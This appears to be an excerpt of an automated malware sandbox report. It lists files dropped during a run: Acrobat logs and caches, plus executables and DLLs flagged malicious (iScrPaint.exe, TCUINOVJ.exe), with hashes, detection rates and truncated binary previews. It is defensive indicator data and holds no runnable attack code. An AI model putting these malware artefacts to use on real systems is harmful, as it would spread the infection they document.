SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8d0lcow:Qw946cPbiOxDlbYnuRK+ow
MD5:171ACDB7A716E6ECC79D03D00D27D59B
SHA1:051948B093F18AC259E315FCA6E1ED02B1CA684E
SHA-256:D592EBC8373B3900973CA476DDE0A24CC79E6A1D7C2E1E1A2A4F72AC2E235185
SHA-512:0FF9F1F0EBF6DA3BD858A534F108DA5634E7015D50FC93C12C2D2E0BB6C9D22C7C12DBFC6132DD82A92C0E18CCC07C5CCAAEF5FDD2D6A439973D201815E0C711
Malicious:false
Preview (UTF-16 decoded):Error 2711.The specified Feature name ('ARM') not found in Feature table. === Logging stopped: 21/12/2024 08:59:19 ===
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (393)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):16525
                                                                                                                                                                                                                                              Entropy (8bit):5.376360055978702
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                                                                                                                                                              MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                                                                                                                                                              SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                                                                                                                                                              SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                                                                                                                                                              SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):15114
                                                                                                                                                                                                                                              Entropy (8bit):5.375575459095472
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:N39fhfMfZflfQ0aQ0E030M/0q0P0J0K0s0lwqwURCRkKdKVKCKZbKuOTOvOZl7ld:DtU
                                                                                                                                                                                                                                              MD5:08BADD2643A1FA7664B34C684DB48985
                                                                                                                                                                                                                                              SHA1:E645324CEE1700FA0E06A786AE847FDDE36E050B
                                                                                                                                                                                                                                              SHA-256:9642515F0ED72B22CA2A92636DAB88BAF32B1577F1C6B27D87822E96B112B2D6
                                                                                                                                                                                                                                              SHA-512:E47FA00C9386A4ED8157116511D580B74A00774758F9F35542435AAEFCB38916D3F41D56668E82BF7BC09BE339E5DE0FA3E9A570EA7F6BEE80FF3F36C7C045B1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:112-0500 ThreadID=7912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:123-0500 ThreadID=7912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:123-0500 ThreadID=7912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:123-0500 ThreadID=7912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:123-0500 ThreadID=7912 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):29752
                                                                                                                                                                                                                                              Entropy (8bit):5.400870070742421
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbt:5
                                                                                                                                                                                                                                              MD5:0057C45FD61F945E5FBE3AB035AB28C3
                                                                                                                                                                                                                                              SHA1:2B63E6195B89CF3BB3A0B2C5E3DFF0BFC09B5492
                                                                                                                                                                                                                                              SHA-256:D055C773C5FA3A3E887848847BDD31B7C2E49C5C80A5FD7B195671BAD3C90D8C
                                                                                                                                                                                                                                              SHA-512:F7D804E03FBE592072F85C3A01A34032D52FDD23038D21B6465E3440E8B4BBADDB9C81650EEB8E2E4326C7318149ABAF0434893B8A125939437EA629E76D6024
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:dropped
Size (bytes):758601
Entropy (8bit):7.98639316555857
Encrypted:false
SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:3A49135134665364308390AC398006F1
SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:dropped
Size (bytes):1419751
Entropy (8bit):7.976496077007677
Encrypted:false
SSDEEP:24576:/RwYIGNP4meWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:ZwZG6XWLxXGZN3mlind9i4ufFXpAXkru
MD5:3E2D879F2C17CB927D259AABADA22E63
SHA1:244E867380AF3F02DA05F1545B9EB4C5AF4344F1
SHA-256:859600ADE2AC3561FB00A165DD68DCFA12819776AC96A43BE9C6A775782B042A
SHA-512:BBC0B0603988A51E3A0B03FEF585EA3C79C4F0ADD0EAE8A96C010F085FF1BBDD28F677EFC56CA638B282602C4A60190E0C8BAD93017923B1E7F549F48294C0F1
Malicious:false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:dropped
Size (bytes):1407294
Entropy (8bit):7.97605879016224
Encrypted:false
SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLrGZkwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLrGZx
MD5:0DEB641F638584E0D369B736918ADE0D
SHA1:F28C3A8DF2F27ED0505D17C146DD4E3B3D02585F
SHA-256:3FCEA64B11AADB53C8AF1073FEBAAEDB9CD9489CF209A4C091F7C16BD62302BE
SHA-512:1E504F602EC378DE6A4B0A63B786B7FBA42FFB3FC05151EC01747AAFA234478943C0D38C1622DB985FBE82ADC5472CB7477344C9A7606AB4CE4F6F38C29A623F
Malicious:false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:dropped
Size (bytes):386528
Entropy (8bit):7.9736851559892425
Encrypted:false
SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:5C48B0AD2FEF800949466AE872E1F1E2
SHA1:337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:false
Process:C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
File Type:data
Category:dropped
Size (bytes):1037483
Entropy (8bit):7.557412715223082
Encrypted:false
SSDEEP:24576:feLXBhXa50sZ2oAUn9lz/uAdJD3vpZu05n42gAE:GLTmvyUPvp320O2gAE
MD5:D5D6AF4BB6B117FB72758293C9F0EADF
SHA1:32BFAAB014C8DA22E875C7FC656BA713542C3198
SHA-256:928C455928F5E07080CD5C6FFDE51B895412EFB1E7BE9A963932EE0FC2675B8C
SHA-512:D654A9219055F7D9CB36FEAC071C318206121DA41F6E152EA8E5651C1EE9A70D06C91C87677DEEFA035ADDB6E05C9FF5942FAB70B5F7F638783AA3A84FA78CE7
Malicious:false
Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):306176
Entropy (8bit):6.865476116199445
Encrypted:false
SSDEEP:6144:gkK6W/39Y4zbD5ozoOxMEpgSVumtLoYgXCuVy1w5XT7LUI:3Wf9Y4zbNUcQbBgXhVy1w5X3Lx
MD5:63EDA0295FD63BAE2EB8FEA1B24265C0
SHA1:7253EA84A03377D093F5F4B11813325074853214
SHA-256:2C27FD45F2221517C2BE02BFD8D57A2DF2781B97908D26B9F08C26ACD0E6D927
SHA-512:57A3DDB3EB15102D20D33805DD58E02DB8BD683516C5BCA6F8D4D916066EF43998ABEC1966FA5D3B3E5A74E680ED47CF72DEA8C3228F6194C5620CF481C29504
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\iScrPaint.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):7994880
Entropy (8bit):6.703465342581849
Encrypted:false
SSDEEP:196608:639LxBBmYeZ12U8Blc/OwDlcXus9n0SJsv6tWKFdu9CZ:OLx6YeZ12TBlc/OwDlitJsv6tWKFdu9C
MD5:42D6C8DC4853BC75E165840F2E3AF062
SHA1:0CAE81999BEB48D72D54BD6C2AA4BD1195F7A8A6
SHA-256:87850B43C89E0D8C132D7BE8DED5B075DFBCF9F4AC3802F6C9169EDBB168288A
SHA-512:CBA53C9F6B46D4891C7C05BEE34FF87B64CA96C8607DD3332F7D0318721BFF90D5E14152BC29040E8F27DABA5516A8B23E880BFF911821A060609B9C6F9B3FA3
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                              Process:C:\Users\user\iScrPaint.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):794013
                                                                                                                                                                                                                                              Entropy (8bit):7.9061967126983355
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:T6xK8IlPnUWetr9nIaD21C6L7Rb3xhqRVyjHIU0QEWJJeZmZeUc:mM8kcWONKnL7bhqRVyzIU0RYs8ZU
                                                                                                                                                                                                                                              MD5:6D9B330A77FFB52761857313E2797282
                                                                                                                                                                                                                                              SHA1:9A4738CF2B26C3596A11CF5170BD0816A56D5626
                                                                                                                                                                                                                                              SHA-256:08E62528AB5EB1CBDF31F2F46EEF3547E37F5B5164D1B9B92B3D40668472975E
                                                                                                                                                                                                                                              SHA-512:156C84807CEC72EEE292791B4BF8264D0D0571B13EC2F3B359561F27E99513015563E0761A9E36D8DB52B8A22021434BC90D630450C424963A439D7777A56B60
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:t.pY...EkoJ..bkg..N.v...]tP..PI..\sN.LOe.Jegth.u.GD][EB..V.Rj...`.P...k....ksJBfdYdf_....fQ......U....g..u.lDaC.O..R.G.QFE_.J.L.h..r.qw.e.`G..X..Rj.CZc...Ll....E..d[..M.......i..._..eH.F..w.Gi.WN.JPp.B.GVP.....XU.Jna..IPb.....\s.lyx.v.....rHG.W.]...GKry...rf...g.^LJK...w....XyX.k...v.aaw._..Gw...EL........YYrTD.JNRb.qvm...s..y..f..H.....DtO.e...K.......WK.p.L.YIMbjL....D.....\Idg...H....Z^.pj.H...ncj...f...[X..I.dx..x.EV...f..`.e.KW.....fWU`....L.w.xr...Fwx..Y.co.U..p..b.tdX.....].n...l.Q....X..XO.....uii.A..D....f.l..ddHJ.RRiP..E.WX.s..c..sX..r......D..u.U.o.\W.D.PU.njyMw.sC.JJbJ...C.C...B.....c.A.P..N..l_..kO\..Hj.....dIxjt..K..^]Nfv...Gn.e.....Q...RvHje.R].s.Ts.uQ\ep^.Bq..d.......n..oF.Nq...`.h...f.q[qnqM.pE.V.......e.S.u.].TqW.A..]m..y.G..e.VP..RU.`b.Jr..ki^.w[lI.uy...Ya..W..[y..My..FI^no.nC.....a...j.uF.X...q.Jt^.E.N.PWb.gCu.]..IEBQOSeKXB^..e...XE.f..`vlL..s.Rv......jcgvg.L..CT....S....d.B[tMWx..V...iYa.....o.w`...T..j.O.D...^..L..OtvR.W.....E.v`.P.Pv.OR.p.....D^BYL._.yE^..B.tf..q
                                                                                                                                                                                                                                              Process:C:\Users\user\iScrPaint.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1909504
                                                                                                                                                                                                                                              Entropy (8bit):6.730805689885005
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:GpjwrP6yVgBd39sUUzFti4aTotmIT3SxLmNKbx:GpjwrP6yKTOUmi4aTo1NK9
                                                                                                                                                                                                                                              MD5:098AC4621EE0E855E0710710736C2955
                                                                                                                                                                                                                                              SHA1:CE7B88657C3449D5D05591314AAA43BD3E32BDAA
                                                                                                                                                                                                                                              SHA-256:46AFBF1CBD2E1B5E108C133D4079FADDC7347231B0C48566FD967A3070745E7F
                                                                                                                                                                                                                                              SHA-512:3042785B81BD18B641F0A2B5D8AEC8EF86F9BF1269421FB96D1DB35A913E744EAFF16D9DA7A02C8001435D59BEFB9F26BC0BBFA6E794811ABF4282ED68B185FE
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: de7s.txt.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: ofsetvideofre.click.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: NPKpnpi8wd.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...s..d..................................... ....@...........................!..................@......................P....@...F......8................;......8"...................................................L...............................text............................... ..`.itext..P........................... ..`.data........ ......................@....bss.....g...............................idata...F...@...H..................@....edata..P...........................@..@.tls....L................................rdata..............................@..@.reloc..8".......$..................@..B.rsrc...8............*..............@..@....................."..............@..@........................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\iScrPaint.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):64950
                                                                                                                                                                                                                                              Entropy (8bit):4.515083558964412
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:RkNN3WO3yFEA8KV587xJxRaMv7+NHE8qsK4pezGNxzOW/Ro:0ZWO3yFEA8ECRRv7uk8qsK4kzGN9OWu
                                                                                                                                                                                                                                              MD5:DB9F61246773A0BA48516A9549603B06
                                                                                                                                                                                                                                              SHA1:6CB9FF25201C920D61FF861A687DC7FA1D321C18
                                                                                                                                                                                                                                              SHA-256:6B6D7477963EA3AA4028878716A918A3028D6452F1AB1CBF92B4F073FE81F973
                                                                                                                                                                                                                                              SHA-512:79AC6DEE0EB3B3F210230481695D6E7324018A329871F0A32D02480A7CECC4F31353C32A5B14E6E686288AB2E0AA5CCFA9103C89E212DB79591F06491FF7E0AB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.vYZ...x[T.F.g\W.[...W..`.p.....Ha..ll.yP[`D.......Y.Iw.^pg.K.q.e..l.B...aR.......Y.l.U...c^x....vLm..ixf_Qm.J`A.y.rF......yT.LqSiEaaL`..A.L..UQ..o....q[..\yeWDv.....EXf^..........T.p..XZ..JlS..wLXSl...EU..i].....n......AFs.UN^[.w.]...ME.FfT..W...BO.].ul....BH...V....p..\._uy.B..w...M.srg..r.LU.XC.....^..`..w..Q.O....ARR.FX..Vk.OCp]....r.CQC.].M.j...JB...P.XI..`Gu`.iq....HY.xai.....jh.M.TfG.it.rm..^L_W..E..cU.B.hI.i.`i..qY[.CTGom.O.AUZ.TB.....r....k.Lm.....w.u..D.g.d..Sj.nK.bb...RN.SF..SR.w.VZ..p.m..OvKlL.N.qOIe...^._`..y...FGdq......q.s.p]Y.o.IM.s.Y....qEXTi.Q.gX.e...\N..F.m.H.w.mv.`.lm.].n[b.VmmT.FH.C.h..rhf[..rwr.DYg_..SN..L...Q..l....s..h..W..HSkgK..S..l..xn.FcL...n.Oi^gE...m.Q.....e..^jf.f.I...xMd.i..^kJfT`ERdiW..X.....n].t..i.d`.....uE...k...w.Aw.h.l..C..`eap.....`A_......ZpI...mX.h.biq.xjy.g...Dgo.Ta....p.EY....JYD..e.O.w...aKX...qrXUh.BG_..i.CvSUl.c.q...w......Sg..DI..qC.c..]Ym\].P..I....T..bhl\.o.[D..G..KP...\.........SI[.r.Sf.....hL..dx]acI.GE..\BTACV.].PQhe.P.....DPuvs..r.df
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):114905
                                                                                                                                                                                                                                              Entropy (8bit):7.668231614662199
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:jeoHTJykCVHX9YGQ9eet/vXZ7bBLZ/YOoEGs4Ga4L8/3F9q0a5wi0sbgQa6:yoH9e9YGBUwi0a54sbW6
                                                                                                                                                                                                                                              MD5:E6CA828043E98DD4CAF25C734E02B125
                                                                                                                                                                                                                                              SHA1:A557D937514A1430246D18D73EB32DFEF96851E3
                                                                                                                                                                                                                                              SHA-256:AA395834597F348B15C4A7A4FCFDBD28EB92A0A2D34AFE67AD8EB3E1E43E812C
                                                                                                                                                                                                                                              SHA-512:D6F470229AFF27285D6F0579958F7911095D942B11F97037E14170FB178874C34B8631BB1995943326B872934B457A2484E96AB1B7F85F972D0712DF26C6708E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 18 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/ViewerPreferences 147 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 15 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</XObject<</Image5 5 0 R>>/ExtGState<</GS7 7 0 R/GS10 10 0 R>>/Font<</F1 8 0 R/F2 11 0 R/F3 13 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.25 842] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 9352>>..stream..x..][s..~W....7r+<..N.V*U.%;Z.^....>P.D).HG..*..<.7.S....9g8...1.a....}.....h.....?...._<}......._l.|...^........j[U..V.1.V.M...w.......?7....m...Vo.KG..q.....{.....+.y|....{.'_...<x.....Z=.............[:"<BWU.u.i.....G~.}../.F......SH..M..>.}.6..C_=W..Um.......n......._ ..3..(.>YVo........R...m....\u.....W...>?....#....ss...=.W^..............3.k..n..E..^...%q...&..j.6.....Hw@.
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                                                                                              Entropy (8bit):7.984814257463729
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:+pBuC+EFiXOTjaeL7NoH4+98UbnQojwLLoOi/tehPE3FtMx:+pyEk+HaEW4NUbn/jmL04Fx
                                                                                                                                                                                                                                              MD5:38F517307990F8B2F9CEB8DE5BD1A528
                                                                                                                                                                                                                                              SHA1:586E0A8A4291BD07807DCB61DFEC7050B3010E13
                                                                                                                                                                                                                                              SHA-256:950C71D472A5AF01C0C0F9AA43D11CA955BE3A5F267ABFA13CC7027639B0D42B
                                                                                                                                                                                                                                              SHA-512:E6F0850A42F618AFA6559FC4FFEA935D9829E09FD8B25DEFAEEDCDCE3CA77F1E76DE85E8A8D65B46788D7140FABAF3FE9475B2926464B8A7D4280A8DAF98BD93
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                              Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.......................................................................................0...............................text............................... ..`.rdata...0...0...2..................@..@.data...,)...p.......H..............@....rsrc................P..............@..@........U.......SVWj'.....u..v..=`2A..6P......P..e......~..v8.^..3......h.3A.P..........P......P..p1A..E..E....;F.r......P.,f..Y.-..j...t1A...t$..l....3.9..wA.t...@....9D$.t..t$.Ph.....5.wA....2A.3.....D$..`...|$..u..@.....3.....D$...V...t...P.Q...^....T$.V.t$......f..BBFFf..u.^.L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q......3.9F.Y~.9F.~...f..Af..G@;F.|..6....Y.F..>f.$G..^._^[...U..QQ..lwA..uVj.j..E.P.5.wA...l1A...t>.E.;E.w6r..E.;E.s,j*.....P.He.....YYt...(wA.j.....@... .
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):7994880
                                                                                                                                                                                                                                              Entropy (8bit):6.703465342581849
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:196608:639LxBBmYeZ12U8Blc/OwDlcXus9n0SJsv6tWKFdu9CZ:OLx6YeZ12TBlc/OwDlitJsv6tWKFdu9C
                                                                                                                                                                                                                                              MD5:42D6C8DC4853BC75E165840F2E3AF062
                                                                                                                                                                                                                                              SHA1:0CAE81999BEB48D72D54BD6C2AA4BD1195F7A8A6
                                                                                                                                                                                                                                              SHA-256:87850B43C89E0D8C132D7BE8DED5B075DFBCF9F4AC3802F6C9169EDBB168288A
                                                                                                                                                                                                                                              SHA-512:CBA53C9F6B46D4891C7C05BEE34FF87B64CA96C8607DD3332F7D0318721BFF90D5E14152BC29040E8F27DABA5516A8B23E880BFF911821A060609B9C6F9B3FA3
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............uF.uF.uFs..F.uF...F..uF.c.F.uF.c.F.uF.tF..uF...F..uF...F.uF...F.uF...F.uF...F.uF...F.uFRich.uF........................PE..L...A..R...........!.....^U..@%.......J......pU...............................z......nz...@..........................vq......Tq.......t.......................t..E...wU..............................gn.@............pU.D............................text...`]U......^U................. ..`.rdata..+....pU......bU.............@..@.data...H.....q..z...lq.............@....unwanted.....t.......s.............@..@.rsrc.........t.......s.............@..@.reloc........t.......s.............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):794013
                                                                                                                                                                                                                                              Entropy (8bit):7.9061967126983355
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:T6xK8IlPnUWetr9nIaD21C6L7Rb3xhqRVyjHIU0QEWJJeZmZeUc:mM8kcWONKnL7bhqRVyzIU0RYs8ZU
                                                                                                                                                                                                                                              MD5:6D9B330A77FFB52761857313E2797282
                                                                                                                                                                                                                                              SHA1:9A4738CF2B26C3596A11CF5170BD0816A56D5626
                                                                                                                                                                                                                                              SHA-256:08E62528AB5EB1CBDF31F2F46EEF3547E37F5B5164D1B9B92B3D40668472975E
                                                                                                                                                                                                                                              SHA-512:156C84807CEC72EEE292791B4BF8264D0D0571B13EC2F3B359561F27E99513015563E0761A9E36D8DB52B8A22021434BC90D630450C424963A439D7777A56B60
